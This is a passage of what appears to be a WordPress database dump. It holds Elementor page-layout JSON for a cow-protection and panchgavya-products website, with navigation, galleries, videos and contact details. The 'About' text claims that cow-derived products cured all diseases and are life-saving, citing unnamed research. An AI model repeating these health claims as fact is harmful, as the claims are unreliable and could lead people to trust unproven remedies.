size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/adopt-donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\\n\\n\\n\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/adopt-donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10879,1812,'_elementor_page_assets','a:0:{}'),(10882,1813,'_elementor_edit_mode','builder'),(10883,1813,'_elementor_template_type','wp-page'),(10884,1813,'_elementor_version','3.7.8'),(10885,1813,'_wp_page_template','elementor_canvas'),(10886,1813,'_elementor_data','[{\"id\":\"bd48cf8\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"a54ffbe\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"13df1e1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"e9cb50b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"3e6d778\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"8b2632b\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b2360e0\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"497dcae\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"682b6d2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"e793398\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/adopt-donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"26193d5\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"21b2e7c\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"ed693bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"9ad2eca\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9c89a5d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a0807d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b828571\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\",\"id\":1577,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0caef34\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.<\\/p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung \\/ cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today\\u2019s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise\\/marketing, they are not able to reach people even people want these best products<\\/p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation\\u2019s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold\\u2019s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25721f3\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b7dd35b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c9a8b6b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a3c36fb\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10887,1813,'_elementor_page_assets','a:0:{}'),(10889,1814,'_elementor_edit_mode','builder'),(10890,1814,'_elementor_template_type','wp-page'),(10891,1814,'_elementor_version','3.7.8'),(10892,1814,'_wp_page_template','elementor_canvas'),(10893,1814,'_elementor_data','[{\"id\":\"bd48cf8\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"a54ffbe\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"13df1e1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"e9cb50b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"3e6d778\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"8b2632b\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b2360e0\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"497dcae\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"682b6d2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"e793398\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/adopt-donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"26193d5\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"21b2e7c\",\"elType\":\"widget\",\"settings\":{\"text\":\"About 